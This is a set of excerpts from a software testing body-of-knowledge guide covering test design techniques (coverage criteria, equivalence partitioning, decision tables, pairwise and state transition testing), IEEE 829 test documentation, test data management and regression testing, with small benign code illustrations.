1. Megan S. Sumrell, Quality Architect, Mosaic ATM, Inc. (Quest 2013 Conference Presentation).
2. William Wake, Senior Consultant, Industrial Logic, Inc.
Estimable - User Stories must be created such that their size can be estimated.
Small - User Stories should not be so big as to become impossible to plan/task/prioritize with
a certain level of certainty. As a rule of thumb, a User Story should require no more than four
days and no less than a half day to implement.
Testable - A User Story must provide the necessary information to make test development
possible.
Recognizing that User Stories are a high-level description and focused on the value or result
the user will receive, it is uncommon to test the User Story directly.
In the Agile development model, unit testing is at the heart of the testing process. Developers
will typically break down the User Story into distinct program modules and the unit testing
process tests those modules at the code level. By contrast, the tester looks at the system more
holistically with a goal to test the system the way the user will use it. The tester asks questions
like: what would the user do, how might the user misuse the system intentionally or
unintentionally, and what might derail the process from attaining the objective of the User Story?
In essence, testing takes on a much more exploratory testing flavor (see section 1.9.2.4).
As a precursor to discussing the Agile testing process it is important to remember that testing
on an Agile project is not a phase but rather a continuous process throughout the life cycle.
The success of an Agile developed product mandates this commitment to continuous testing.
During the process of writing the User Story the product owner also writes acceptance criteria,
which defines the boundaries of a User Story, and will be used during development to validate
that a story is completed and working as intended. The acceptance criteria will include the
functional and non-functional criteria. These criteria would identify specific user tasks,
functions or business processes that must be in place at the end of the sprint or project. A
functional requirement might be “On acceptance of bank debit card the PIN input field will be
displayed.” A non-functional requirement might be “Option LEDs will blink when option is
available.” Performance will typically be a criterion and likely measured as a response time.
Expected performance should be spelled out as a range such as “1-3 seconds for PIN
acceptance or rejection.”
Each User Story will have one or more acceptance tests. Similar to the Use Case test process
as described in section 7.2.5.1, the acceptance tests should be scenario based and can then be
broken down into one or more test cases. Acceptance tests are by default part of the happy
path. Tests that validate the correct function of features required by the acceptance test are
also considered happy path tests. Tests for sad and alternate paths are best executed after the
happy path tests have passed.
The detailed development of test cases used to validate the acceptance criteria will utilize test
design techniques described in section 7.4.
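As a hedged sketch (the structure and field names are assumptions made for illustration), the acceptance criteria from the debit-card example above could be captured as data that a test harness then turns into test cases:

# Acceptance criteria for a User Story, expressed as records a test harness could check.
acceptance_criteria = [
    {"type": "functional",
     "given": "a bank debit card is accepted",
     "then": "the PIN input field is displayed"},
    {"type": "non-functional",
     "given": "an option is available",
     "then": "the option LED blinks"},
    {"type": "performance",
     "measure": "PIN acceptance or rejection response time",
     "acceptable_range_seconds": (1, 3)},
]
for criterion in acceptance_criteria:
    print(criterion["type"], "-", criterion.get("then", criterion.get("measure")))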
section 7.1.3). Regardless of the development methodology, the need to understand first the
objectives of the tests and then the conditions to be tested is irrefutable.
With the objectives and conditions understood, the next step would be to understand the types
of test design techniques that can be employed in the development of test cases. Test design
techniques can be grouped into four major categories:
• Structural Testing
• Functional Testing
• Experience-Based Techniques
• Non-Functional Testing
For the purpose of describing structural test case design techniques in this skill category, the
focus will be on white-box testing techniques.
White-box testing (also referred to as clear-box testing, glass-box testing, and structure-based
testing) includes the following types of test techniques:
• Statement Testing
• Branch Testing
• Decision Testing
• Branch Condition Testing
• Branch Condition Combination Testing
• Modified Condition Decision Coverage Testing
• Data Flow Testing
Collectively, statement, branch, decision, branch condition, branch condition combination and
modified condition decision testing are known as Control Flow Testing. Control Flow Testing
tends to focus on ensuring that each statement within a program is executed at least once. Data
Flow Testing by contrast focuses on how statements interact through the data flow.
Shown here is an example of code that sets a variable (WithdrawalMax) and reads two numbers
into variables (AcctBal and WithdrawalAmt). If there are sufficient funds in the account to
cover the withdrawal amount, the program prints a message indicating that; if there are not
sufficient funds, a message is printed and the program terminates. If sufficient funds exist, the
program then checks whether the withdrawal amount exceeds the withdrawal maximum. If so,
it prints a message that the withdrawal exceeds the limit and terminates; otherwise the program
terminates. This code is shown in the flow chart in Figure 7-6. Every box in the flowchart
represents an individual statement.
WithdrawalMax = 100
INPUT AcctBal
INPUT WithdrawalAmt
IF AcctBal >= WithdrawalAmt THEN
    PRINT "Sufficient Funds for Withdrawal"
    IF WithdrawalAmt > WithdrawalMax THEN
        PRINT "Withdrawal Amount Exceeds Withdrawal Limit"
    END IF
ELSE
    PRINT "Withdrawal Amount Exceeds Account Balance"
END IF
For statement testing, a series of test cases will be written to execute each input, decision, and
output in the flowchart.
1. Set the WithdrawalMax variable, read data, evaluate availability of funds as not
sufficient, and print message.
2. Set the WithdrawalMax variable, read data, evaluate availability of funds as sufficient,
print message, evaluate the limit as exceeded, and print message.
By executing both tests, all statements have been executed achieving 100% statement
coverage. However, in the following section the drawback of just statement testing is
described.
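As a hedged illustration (the function name, return values, and concrete amounts below are assumptions; the STBOK example itself is pseudocode), the same logic and the two statement-coverage tests might be written in Python as:

WITHDRAWAL_MAX = 100

def withdraw_messages(acct_bal, withdrawal_amt):
    """Mirror of the pseudocode: return the messages the program would print."""
    messages = []
    if acct_bal >= withdrawal_amt:
        messages.append("Sufficient Funds for Withdrawal")
        if withdrawal_amt > WITHDRAWAL_MAX:
            messages.append("Withdrawal Amount Exceeds Withdrawal Limit")
    else:
        messages.append("Withdrawal Amount Exceeds Account Balance")
    return messages

# Test 1: funds not sufficient, so the "exceeds account balance" statement executes.
assert withdraw_messages(50, 80) == ["Withdrawal Amount Exceeds Account Balance"]

# Test 2: funds sufficient and limit exceeded, so the remaining statements execute.
assert withdraw_messages(500, 200) == ["Sufficient Funds for Withdrawal",
                                       "Withdrawal Amount Exceeds Withdrawal Limit"]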
Referring to the source code and flow chart from section 7.4.1.1, it is necessary to find the
minimum number of paths which will ensure that all true/false decisions are covered. The
paths can be identified as follows using the numbers in Figure 7-6.
1. 1A-2B-3C-4D-5E
2. 1A-2B-3C-4F-6G-7J
3. 1A-2B-3C-4F-6G-7H-8I
For this example, the number of tests required to ensure decision or branch coverage is 3.
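As a sketch only (the concrete amounts are assumptions), three inputs such as the following would together exercise both the true and false outcomes of each decision in the withdrawal example:

# Inputs chosen so that every true/false branch of both decisions is taken.
decision_coverage_inputs = [
    {"acct_bal": 50,  "withdrawal_amt": 80},    # AcctBal >= WithdrawalAmt is FALSE
    {"acct_bal": 500, "withdrawal_amt": 50},    # first decision TRUE, limit check FALSE
    {"acct_bal": 500, "withdrawal_amt": 200},   # first decision TRUE, limit check TRUE
]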
For this example the source code in 7.4.1.1 has been modified to remove the nested “if” by
creating a compound condition. In this code a CreditLine variable has been added that when a
credit line is available (by answering Y) then funds withdrawal is always approved. The
resultant code is shown below:
WithdrawalMax = 100
INPUT AcctBal
INPUT WithdrawalAmt
INPUT CreditLine
IF CreditLine = "Y" OR (AcctBal >= WithdrawalAmt AND WithdrawalAmt <= WithdrawalMax) THEN
    PRINT "Withdrawal of Funds Approved"
ELSE
    PRINT "Withdrawal of Funds Denied"
END IF
Branch Condition Coverage would require Boolean operand Exp1 (CreditLine = "Y") to be
evaluated both TRUE and FALSE, Boolean operand Exp2 (AcctBal >= WithdrawalAmt) to be
evaluated both TRUE and FALSE, and Boolean operand Exp3 (WithdrawalAmt <= WithdrawalMax)
to be evaluated both TRUE and FALSE.
Branch Condition Coverage may therefore be achieved with the following set of test inputs
(note that there are alternative sets of test inputs which will also achieve Branch Condition
Coverage).
Case Exp1 Exp2 Exp3
1 FALSE FALSE FALSE
2 TRUE TRUE TRUE
While this would exercise each of the Boolean operands, it would not test all possible
combinations of TRUE / FALSE. Branch Condition Combination Coverage would require all
combinations of Boolean operands Exp1, Exp2 and Exp3 to be evaluated. Table 7-7 shows the
Branch Condition Combination Testing table for this example.
Branch Condition Combination Coverage is very thorough, requiring 2n test cases to achieve
100% coverage of a condition containing n Boolean operands. This rapidly becomes
unachievable for more complex conditions.
Modified Condition Decision Coverage is a compromise which requires fewer test cases than
Branch Condition Combination Coverage. Modified Condition Decision Coverage requires
test cases to show that each Boolean operand (Exp1, Exp2, and Exp3) can independently
affect the outcome of the decision. This is less than all the combinations (as required by
Branch Condition Combination Coverage). This reduction in the number of cases is often
referred to as collapsing a decision table and will be described in further detail in the decision
table section of black-box testing.
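A minimal sketch of the difference, assuming Exp1, Exp2, and Exp3 map to the three operands of the compound condition above (the function and the particular MC/DC subset shown are assumptions of this sketch, not taken from the STBOK):

from itertools import product

def decision(exp1, exp2, exp3):
    """Exp1 or (Exp2 and Exp3), matching the compound condition in the sample code."""
    return exp1 or (exp2 and exp3)

# Branch Condition Combination Coverage: all 2^3 = 8 combinations.
for exp1, exp2, exp3 in product([True, False], repeat=3):
    print(exp1, exp2, exp3, "->", decision(exp1, exp2, exp3))

# One possible Modified Condition Decision Coverage subset (4 cases rather than 8):
# each operand is toggled while the others are held so the toggle alone flips the outcome.
mcdc_subset = [
    (True,  True,  False),   # with (False, True, False): only Exp1 differs, outcome flips
    (False, True,  False),
    (False, False, True),    # with (False, True, True): only Exp2 differs, outcome flips
    (False, True,  True),    # with (False, True, False): only Exp3 differs, outcome flips
]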
characteristics of the loops. Boundary and interior testing require executing loops zero times,
one time, and if possible, the maximum number of times. Linear sequence code and jump
criteria specify a hierarchy of successively more complex path coverage.
Data flow analysis, when used in test case generation, exploits the relationship between points
where variables are defined and points where they are used.
• use at 7
For the purpose of describing functional test case design techniques in this section of Skill
Category 7, the focus will be on black-box testing techniques.
and output results. The benefit of this technique is that you do not need to generate redundant
test cases by testing each possible value with identical outcomes.
Equivalence classes (EC) are most suited to systems in which much of the input data takes on
values within ranges or within sets, thereby significantly reducing the number of test cases
that must be created and executed. One of the limitations of this technique is that it makes the
assumption that the data in the same equivalence class is processed in the same way by the
system.
Note: Error masking can occur when more than one invalid value is contained in a single test
case. The processing of the test case may be terminated when an earlier invalid value is
executed, thus never processing or evaluating subsequent invalid data. The result is not
knowing how that invalid value is processed.
Referring back to the earlier example: the withdrawal limit is set to $100 and two variables are
read, account balance and withdrawal amount. If there are sufficient funds in the account to
cover the withdrawal amount, the program prints a message indicating that; if there are not
sufficient funds, a message is printed indicating that. If sufficient funds exist, the program then
checks whether the withdrawal amount exceeds the withdrawal limit. If so, it prints a message
that the withdrawal exceeds the limit.
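A minimal sketch of the resulting partitions, assuming an account balance of $500 and the $100 withdrawal limit from the example (the representative values chosen are assumptions):

# One representative withdrawal amount is chosen from each equivalence class.
equivalence_classes = {
    "valid: amount <= balance and amount <= withdrawal limit": 60,
    "invalid: amount > withdrawal limit":                      150,
    "invalid: amount > account balance":                       600,
}
for description, representative in equivalence_classes.items():
    print(description, "-> test with", representative)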
An advantage of the equivalence partitioning technique is that it eliminates the need for
exhaustive testing. It enables testers to cover a large domain of inputs or outputs with a
smaller subset of input data selected from an equivalence partition. This technique also
enables the testers to select a subset of test inputs with a high probability of detecting a defect.
One of the limitations of this technique is that it assumes that data in the same equivalence
partition is processed in the same way by the system. Note that equivalence partitioning is not
a stand-alone method to determine test cases. It has to be supplemented by the ‘Boundary
Value Analysis’ technique, which is discussed in the next section.
An advantage of the Boundary Value Analysis technique is that the technique helps discover
contradictions in the actual system and the specifications, and enables test cases to be
designed as soon as the functional specifications are complete. As discussed numerous times,
the earlier testing can begin the better. BVA allows early static testing of the functional
specifications.
This technique works well when the program to be tested is a function of several independent
variables that represent bounded physical quantities.
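As a hedged sketch, boundary values around the $100 withdrawal limit used earlier (plus an assumed minimum withdrawal of $1, which is not stated in the example) would be tested at, just below, and just above each boundary:

withdrawal_limit = 100
minimum_withdrawal = 1   # assumption for illustration only

# Test at each boundary, just below it, and just above it.
boundary_values = [withdrawal_limit - 1, withdrawal_limit, withdrawal_limit + 1,
                   minimum_withdrawal - 1, minimum_withdrawal, minimum_withdrawal + 1]
print(sorted(set(boundary_values)))   # [0, 1, 2, 99, 100, 101]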
Decision tables are used to describe and analyze problems that contain procedural decision
situations characterized by one or more conditions; the state of these conditions determines
the execution of a set of actions. Decision tables represent complex business rules based on a
set of conditions.
                    Rule 1    Rule 2    -----    Rule p
Condition Stub                Condition Entry
  Condition 1
  Condition 2
  -----
  Condition m
Action Stub                   Action Entry
  Action 1
  Action 2
  -----
  Action n
• The upper left portion of the format is called the condition stub quadrant; it contains
statements of the conditions. Similarly, the lower left portion is called the action stub
quadrant; it contains statements of the actions. The condition entry and action entry quadrants
that appear in the upper and lower right portions form a decision rule.
• The various input conditions are represented by the conditions 1 through m and the
actions are represented by actions 1 through n. These actions should be taken
depending on the various combinations of input conditions.
• Each of the rules defines a unique combination of conditions that result in the
execution (firing) of the actions associated with the rule.
• All the possible combinations of conditions define a set of alternatives. For each
alternative, a test action should be considered. The number of alternatives increases
exponentially with the number of conditions, which may be expressed as
2^(number of conditions). When the decision table becomes too complex, a hierarchy of new
decision tables can be constructed.
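As a non-authoritative sketch, a small decision table for the earlier withdrawal example could be captured as data; the condition and action names, and the use of None for a condition that is not relevant to a rule, are assumptions of this sketch:

#                                Rule 1  Rule 2  Rule 3
decision_table = {
    "conditions": {
        "sufficient funds": [False,  True,   True],
        "within limit":     [None,   False,  True],   # None = not relevant for this rule
    },
    "actions": {
        "deny withdrawal":    [True,  True,  False],
        "approve withdrawal": [False, False, True],
    },
}
# Each column (rule) defines one unique combination of conditions and the actions it
# fires, and therefore at least one test case.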
The advantage of decision table testing is that it allows testers to start with a “complete” view,
with no consideration of dependence, and then consider the “dependent,” “impossible,”
and “not relevant” situations, eliminating some test cases.
The disadvantage of decision table testing is the need to decide (or know) what conditions are
relevant for testing. Also, scaling up is challenging because the number of test cases increases
exponentially with the number of conditions (scaling up can be massive: 2^n for n conditions).
Decision table testing is useful for those applications that include several dependent
relationships among the input parameters. For simple data-oriented applications that typically
perform operations such as adding, deleting, and modifying entries, this technique is not
appropriate.
The Pair-Wise testing technique can significantly reduce the number of test cases. It protects
against pair-wise defects which represent the majority of combinatorial defects. There are
tools available which can create the All pairs table automatically. Efficiency is improved
because the much smaller pair-wise test suite achieves the same level of coverage as larger
combinatorial test suites.
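A minimal sketch of the idea for three two-valued parameters (the four hand-picked rows are an assumption of this sketch, not the output of any particular tool): four rows cover every pair of parameter values, versus the 2^3 = 8 rows needed for all combinations.

from itertools import combinations, product

pairwise_rows = [(True, True, True),
                 (True, False, False),
                 (False, True, False),
                 (False, False, True)]

def covers_all_pairs(rows, num_params=3, values=(True, False)):
    """Check that every value pair appears for every pair of parameter positions."""
    for i, j in combinations(range(num_params), 2):
        needed = set(product(values, repeat=2))
        seen = {(row[i], row[j]) for row in rows}
        if seen != needed:
            return False
    return True

assert covers_all_pairs(pairwise_rows)   # 4 rows achieve pair-wise coverage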
cannot take place before Event A). When an event occurs, the system can change state
or remain in the same state and/or execute an action. Events may have parameters
associated with them.
• Action (represented by a command following a “/”) An action is an operation
initiated because of a state change. Often these actions cause something to be created
that is an output of the system.
The disadvantage of State Transition testing is that it becomes very large and cumbersome
when the number of states and events increases.
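As a hedged sketch (the states, events, and the kiosk-style scenario are assumptions made for illustration), a state/event table and a check that an event sequence follows only valid transitions might look like this:

# Valid (state, event) -> next-state transitions.
transitions = {
    ("Idle", "insert_card"): "AwaitingPIN",
    ("AwaitingPIN", "valid_pin"): "MainMenu",
    ("AwaitingPIN", "invalid_pin"): "AwaitingPIN",
    ("MainMenu", "cancel"): "Idle",
}

def run(events, state="Idle"):
    """Walk the event sequence, failing if any transition is not defined."""
    for event in events:
        key = (state, event)
        assert key in transitions, f"invalid transition: {key}"
        state = transitions[key]
    return state

assert run(["insert_card", "invalid_pin", "valid_pin", "cancel"]) == "Idle"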
Some people have a natural intuition for test case generation. While this ability cannot be
completely described nor formalized, certain test cases seem highly probable to catch errors.
For example, input values of zero and input values that cause zero outputs are cases where a
tester may guess an error could occur. Guessing carries no guarantee for success, but neither
does it carry any penalty.
intention of stress testing is to identify constraints and to ensure that there are no
performance problems.
• Usability testing: Testing that evaluates the effort required to learn, operate, prepare
input, and interpret output of an application system. This includes the application’s
user interface and other human factors of the application. This is to ensure that the
design (layout and sequence, etc.) enables the business functions to be executed as
easily and intuitively as possible. (See section 1.2.5.1)
• Volume testing: Testing that validates the application’s internal limitations. Examples include the internal accumulation of information (such as table sizes), the number of line items in an event (such as the number of items that can be included on an invoice), the size of accumulation fields, and data-related limitations such as leap years, decade changes, or switching calendar years.
Test cases take what we have learned needs to be tested and combine it with the skillful use of test techniques to precisely define what will be executed and what is being covered.
Experience shows that it is uneconomical to test all conditions in an application system.
Experience further shows that most testing exercises less than one-half of the computer
instructions. Therefore, optimizing testing through selecting the most important processing
events is the key aspect of building test cases.
If resources are limited, the best use of those resources will be obtained by testing the
most important test conditions. The objective of ranking is to identify high-priority test
conditions that should be tested first. Considerations may include the stability of the
system, level of automation, skill of the testers, test methodology, and, most
importantly, risk.
Ranking does not mean that low-ranked test conditions will not be tested. Ranking can
be used for two purposes: first, to determine which conditions should be tested first;
and second, and equally as important, to determine the amount of resources allocated
to each of the test conditions.
The IEEE 829 template for test case specification is shown below:
1. Test Case Specification Identifier
2. Test Items
3. Input Specifications
4. Output Specifications
5. Environment Needs
6. Special Procedural Requirements
7. Inter-Case Dependencies
Test Case Specification Identifier – A unique identifier that ideally follows the same rules
as the software to which it is related. This is helpful when coordinating software and testware
versions within configuration management.
Test Items - Identify the items or features to be tested by this test case. This could include
requirements specifications, design specifications, detail design specifications, and code.
Input Specifications - Identify all inputs required to execute the test case. Items to include
would be: data items, tables, human actions, states (initial, intermediate, final), files,
databases, and relationships.
Output Specifications - Identify all outputs required to verify the test case. This would
describe what the system should look like after the test case is run.
Special Procedural Requirements - Identify any special constraints for each test case.
Inter-Case Dependencies - Identify any prerequisite test cases. One test case may require another case to run before it in order to set up the environment. It is recommended that the relationship between test cases be documented at both ends: the precursor should identify any follow-on test cases, and the follow-on cases should identify all prerequisites.
The IEEE 829 standard provides a good template for organizations to customize to their
unique needs. Listed below is another example of a test case format.
• Test Suite ID - The ID of the test suite to which this test case belongs.
• Test Case ID - The ID of the test case.
• Test Case Summary - The summary/objective of the test case.
• Related Requirement - The ID of the requirement to which this test case relates/traces.
• Preconditions - Any preconditions that must exist prior to executing the test.
• Test Procedure - Step-by-step procedure to execute the test.
• Expected Result - The expected result of the test.
• Actual Result - The actual result of the test.
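A test case following this format can be captured as a simple structured record. The Python sketch below is illustrative only; the field names mirror the list above and the sample values are assumptions.

```python
from dataclasses import dataclass, field

@dataclass
class TestCase:
    suite_id: str                 # Test Suite ID
    case_id: str                  # Test Case ID
    summary: str                  # Test Case Summary
    related_requirement: str      # Related Requirement
    preconditions: list[str] = field(default_factory=list)
    procedure: list[str] = field(default_factory=list)   # Test Procedure steps
    expected_result: str = ""
    actual_result: str = ""

# Illustrative example record.
tc = TestCase(
    suite_id="TS-LOGIN",
    case_id="TC-001",
    summary="Valid user can log in",
    related_requirement="REQ-42",
    preconditions=["A valid user account exists"],
    procedure=["Open login page", "Enter valid credentials", "Submit"],
    expected_result="User lands on the dashboard",
)
print(tc)
```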
The objective of test coverage is simply to assure that the test process has covered the
application. Although this sounds simple, effectively measuring coverage may be critical to
the success of the implementation. There are many methods that can be used to define and
measure test coverage, including:
• Statement Coverage
• Branch Coverage
• Basis Path Coverage
• Integration Sub-tree Coverage
• Modified Decision Coverage
• Global Data Coverage
• User-specified Data Coverage
It is usually necessary to employ some form of automation to measure the portions of the
application covered by a set of tests. There are many commercially available tools that support
test coverage analysis in order to both accelerate testing and widen the coverage achieved by
the tests. The development team can also design and implement code instrumentation to
support this analysis. This automation enables the team to:
• Measure the “coverage” of a set of test cases
• Analyze test case coverage against system requirements
• Develop new test cases to test previously “uncovered” parts of a system
Even with the use of tools to measure coverage, it is usually cost prohibitive to design tests to
cover 100% of the application outside of unit testing or black-box testing methods. One way
to leverage a dynamic analyzer during system testing is to begin by generating test cases
based on functional or black-box test techniques. Examine the coverage reports as test cases
are executed. When the functional testing provides a diminishing rate of additional coverage
for the effort expended, use the coverage results to conduct additional white-box or structural
testing on the remaining parts of the application until the coverage goal is achieved.
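As one hedged example of such automation in a Python environment, the sketch below uses coverage.py (a widely used open-source coverage tool) to measure statement and branch coverage while a pytest suite runs; the source package name and test directory are illustrative assumptions.

```python
import coverage
import pytest

# Measure statement and branch coverage of the (hypothetical) "myapp" package.
cov = coverage.Coverage(branch=True, source=["myapp"])
cov.start()
pytest.main(["tests/"])   # run the functional/black-box test suite
cov.stop()
cov.save()

cov.report(show_missing=True)                # console summary with uncovered lines
cov.html_report(directory="coverage_html")   # drill-down report for further analysis
```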
Skill Category 8
Executing the Test Process
A common mantra throughout the Software Testing Body of Knowledge (STBOK) has
been test early, test often, and test throughout the development life cycle. Skill
Category 6 covered the static testing processes of walkthroughs, checkpoint review,
and inspections. Typically those test processes are used in the earlier phases of the
life cycle. Skill Category 7 identified test techniques most of which can only be used when
actual programming code exists. Whether the life cycle is organized as a series of Agile Scrum Sprints or a long-term waterfall project, ideas coalesce, designs are made, code is written, and checks are done. To that end, the goal of this Skill Category is to describe the processes of test execution across the life cycle, utilizing the knowledge and skills defined in the previous skill categories of the Software Testing Body of Knowledge.
has an opportunity to run the finished program in an environment that parallels the operational
environment for the primary purpose of providing the customer with enough confidence in the
application system to accept delivery. The V-diagram (Figure 1-20) in section 1.8 as well as
table 1-12 in section 1.8.2.2 illustrates where UAT falls within the SDLC. By contrast, the
objective of acceptance testing is to determine throughout the development cycle that all
aspects of the development process meet the user’s needs. There are many ways to accomplish
this. The user may require that the implementation plan be subject to an independent review of
which the user may choose to be a part, or he or she may simply prefer to input acceptance
criteria into the review process.
Test procedure specification identifier - Specify the unique identifier assigned to this test
procedure specification. Supplies a reference to the associated test design specification.
Purpose - Describe the purpose(s) of this procedure. If this procedure executes any test cases,
provide a reference for each of them. In addition, provide references to relevant sections of the
test item documentation (e.g., references to usage procedures).
Special requirements - Identify any special requirements that are necessary for the execution
of this procedure. These may include prerequisite procedures, special skills requirements, and
special environmental requirements.
Procedure steps:
Log - Describe any special methods or formats for logging the results of test execution,
the incidents observed, and any other events pertinent to the test.
Set up - Describe the sequence of actions necessary to prepare for execution of the
procedure.
Start - Describe the actions necessary to begin execution of the procedure.
Proceed - Describe any actions necessary during execution of the procedure.
Measure - Describe how the test measurements will be made (e.g., describe how remote terminal response time is to be measured using a network simulator).
Shut down - Describe the actions necessary to suspend testing when unscheduled events dictate this.
Restart - Identify any procedural restart points and describe the actions necessary to
restart the procedure at each of these points.
Stop - Describe the actions necessary to bring execution to an orderly halt.
Wrap up - Describe the actions necessary to restore the environment.
Contingencies - Describe the actions necessary to deal with anomalous events that may
occur during execution.
• Testing COTS
• When is Testing Complete?
Since the test scripts and test cases may need to run on different platforms, the platforms must
be taken into consideration when designing test cases and test scripts. Since a large number of
platforms may be involved in the operation of the software, testers need to decide which
platforms to include in the test environment.
Software testers should determine the number and purpose of the test cycles to be used during
testing. Some of these cycles will focus on the level of testing, for example unit, integration
and system testing. Other cycles may address attributes of the software such as data entry,
database updating and maintenance, and error processing.
There are potentially three distinct sets of test data required to test most applications: one set of test data to confirm the expected results (data along the happy path), a second set to verify that the software behaves correctly for invalid input data (alternate or sad paths), and finally data intended to force incorrect processing (e.g., to crash the application). Volume testing requires the creation of test data as well.
Test data may be produced in a focused or systematic way or by using other, less-focused
approaches such as high-volume randomized automated tests. Test data may be produced by
the tester, or by a program or function that aids the tester. Test data may be recorded for re-use,
or used once and then forgotten.
The use of production data appears to be the easiest and quickest means of generating test data, and that is true if production data can be used as is. Unfortunately, production data rarely provides good test data. Converting production data into good test data may be as time-consuming as constructing test data from scratch.
Manually created data is a common technique for creating test data. Creating data this way
allows for specific data points to be included in the dataset that will test an application
function whose contents have been predefined to meet the designed test conditions. For
example, master file records, table records, and input data transactions could be generated
after conditions are designed but prior to test execution, which will exercise each test
condition/case. Once data is created to match the test conditions, specific expected results are
determined and documented so that actual results can be checked during or after test
execution.
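A minimal sketch of manually constructed test data is shown below: each record is predefined to hit a specific test condition and carries its expected result so actual results can be checked after execution. The field names, conditions, and file name are illustrative assumptions.

```python
import csv

# (condition id, input record, expected result) - all values are illustrative.
test_records = [
    ("TC-ORD-01", {"customer": "C001", "qty": 1,      "unit_price": 9.99}, "accepted"),
    ("TC-ORD-02", {"customer": "C001", "qty": 0,      "unit_price": 9.99}, "rejected: qty below minimum"),
    ("TC-ORD-03", {"customer": "C999", "qty": 5,      "unit_price": 9.99}, "rejected: unknown customer"),
    ("TC-ORD-04", {"customer": "C001", "qty": 10_000, "unit_price": 9.99}, "rejected: exceeds order limit"),
]

# Write the predefined data and expected results to a file used during test execution.
with open("order_test_data.csv", "w", newline="") as f:
    writer = csv.writer(f)
    writer.writerow(["condition_id", "customer", "qty", "unit_price", "expected_result"])
    for cond_id, rec, expected in test_records:
        writer.writerow([cond_id, rec["customer"], rec["qty"], rec["unit_price"], expected])
```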
There are a variety of models describing the test data management (TDM) lifecycle. A simple but sufficient model includes:
• Analysis
• Design
• Creation
• Use
• Maintenance
• Destruction
Analysis – This step identifies the types of data needed based on the defined test conditions. It also determines how frequently the data will be refreshed and where the test data will be stored.
Design – The design step includes implementing the data storage infrastructure, securing any
tools that might be used, and completing any prep work that might be necessary before the
data creation step.
Creation – This step would follow the sequence of events as described in sections 8.3.3.1 and
8.3.3.2 above.
Use – The shaded section of Figure 8-1 represents the use of test data and illustrates the process for using it.
Maintenance – The test data will require maintenance for a variety of reasons. Reasons might
include: remove obsolete data, update to align with current version, additional functionality to
test, and correction of errors found in test data.
Destruction – At some point, the test data will no longer be of use. Archiving and then deleting the test data should be handled in a manner consistent with the organization’s data security requirements.
Part 3 of the ISO 29119 standard provides templates for test documentation that cover the
entire software testing life cycle. For more information on the ISO 29119 standard visit
www.softwaretestingstandard.org.
The more detailed the test plan, the easier this task becomes for the individuals responsible for
performing the test. The test plan (Skill Category 5) should have been updated throughout the
project in response to approved changes made to the application specifications or other project
constraints (i.e., resources, schedule). This process ensures that the true expected results have
been documented for each planned test.
The roles and responsibilities for each stage of testing should also have been documented in
the test plan. For example, the development team (programmers) might be responsible for unit
testing in the development environment, while the test team is responsible for integration and
system testing in the test environment.
The Test Manager is responsible for conducting the Test Readiness Review prior to the start of
testing. The purpose of this review is to ensure that all of the entrance criteria for the test
phase have been met, and that all test preparations are complete.
The test plan should contain the procedures, environment, and tools necessary to implement
an orderly, controlled process for test execution, defect tracking, coordination of rework, and
configuration and change control. This is where all of the work involved in planning and set-
up pays off.
For each phase of testing, the planned tests are performed and the actual results are compared
to the documented expected results. When an individual performs a test script, they should be
aware of the conditions under test, the general test objectives, as well as specific objectives
listed for the script. All tests performed should be logged in a test management tool (or in a
manual log if not using a tool) by the individual performing the test.
The Test Log (manual or automated) records test activities in order to maintain control over
the test. It includes the test ID, test activities, start and stop times, pass or fail results, and
comments. Be sure to document actual results. Log an incident into the defect tracking system once a review determines that it is actually a defect.
The IEEE 829 provides a standard for Software Test Documentation which defines the Test
Log as a chronological record of relevant details about the execution of test cases. The IEEE
template contents include: 1) Test Log Identifier; 2) Description; and 3) Activity and Event
Entries.
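A minimal sketch of an automated test log recording the IEEE 829 contents listed above is shown below; storing entries as JSON lines, and the identifiers used, are illustrative assumptions rather than anything the standard prescribes.

```python
import json
from datetime import datetime, timezone

LOG_FILE = "test_log.jsonl"  # hypothetical log location

def log_test_execution(test_id, activity, result, comments=""):
    entry = {
        "log_id": "TL-001",               # Test Log Identifier (illustrative)
        "test_id": test_id,               # which test case was run
        "activity": activity,             # Activity and Event Entry
        "timestamp": datetime.now(timezone.utc).isoformat(),
        "result": result,                 # pass / fail
        "comments": comments,             # actual results, anomalies observed
    }
    with open(LOG_FILE, "a") as f:
        f.write(json.dumps(entry) + "\n")

log_test_execution("TC-001", "Executed login happy path", "pass")
log_test_execution("TC-002", "Executed login with locked account", "fail",
                   comments="Error message missing; incident raised for review")
```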
When the development team communicates the defect resolution back to the test team, and the
fix is migrated to the test environment, the problem is ready for retest and execution of any
regression testing associated with the fix.
Regression means to relapse to a less perfect state. Section 1.10.1 of Skill Category 1 described regression testing this way:
Regression testing is not a separate phase of testing, and is not maintenance testing.
Regression testing must occur whenever changes to tested units, environments, or procedures
occur. For that reason the discussion about regression testing processes happens now before
detailed discussion about unit, integration and system testing. Unfortunately, regression
testing is often inadequate in organizations and poses a significant risk to an application.
Regression testing can be one of the most challenging testing processes within an organization
because testers are looking for defects in applications that have already passed in previous test
cycles.
Regression testing happens throughout the life cycle, and for that reason the regression testing approach will vary depending on the stage at which it is conducted. Shown here is an example of a regression test process that carefully introduces changes on the test side so as not to mask defects or allow defects to be injected into the test suite.
An eight-step process can be used to perform regression testing. As a prerequisite, the
assumption is that a complete set of test cases and test data (TS1) exists that thoroughly
exercises the current unchanged version of the software (V1). The following steps show the
process (see Figure 8-2):
Step 1 – Change is introduced into the application system V1 which creates V2 of the
application.
Step 2 – Test the changed software V2 against the unchanged test cases and test data TS1. The
objective is to show that unchanged sections of the software continue to produce the same
results as they did in version 1. If this is done manually, testing the changed portions of the
system can be bypassed. If an automated tool is used, running TS1 against V2 may produce invalid results for the changed portions; these should be disregarded. Only the unchanged portions are evaluated here.
Step 3 – Create an updated version of the test cases and test data (TS2) by removing tests that
are no longer needed due to changes in the system.
Step 4 – Run TS2 against V2. This not only tests the changed portions, but provides another regression test of the unchanged portions. Creating the clean TS2 prevents the tester from introducing errors in the form of new tests and test data added to the test suite.
Step 5 – Create TS3 which is new cases and data designed to exercise just the new
functionality.
Step 6 – Run TS3 against V2. This tests the new functionality only but, more importantly, it tests the new tests themselves with little interaction with, or impact from, the rest of the test suite (TS2).
Step 7 – Combine TS2 and TS3 to create a full test suite of all cases and data (TS4) necessary
to thoroughly exercise the entire system (V2).
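The bookkeeping behind these steps can be illustrated by treating the test suites as sets of test case identifiers, as in the Python sketch below; the identifiers are assumptions used only to show how TS2, TS3, and TS4 are derived.

```python
# Suite that thoroughly exercises the unchanged system V1.
ts1 = {"TC-001", "TC-002", "TC-003", "TC-004"}

obsolete = {"TC-003"}          # tests invalidated by the change (Step 3)
ts2 = ts1 - obsolete           # updated suite run against V2 (Step 4)

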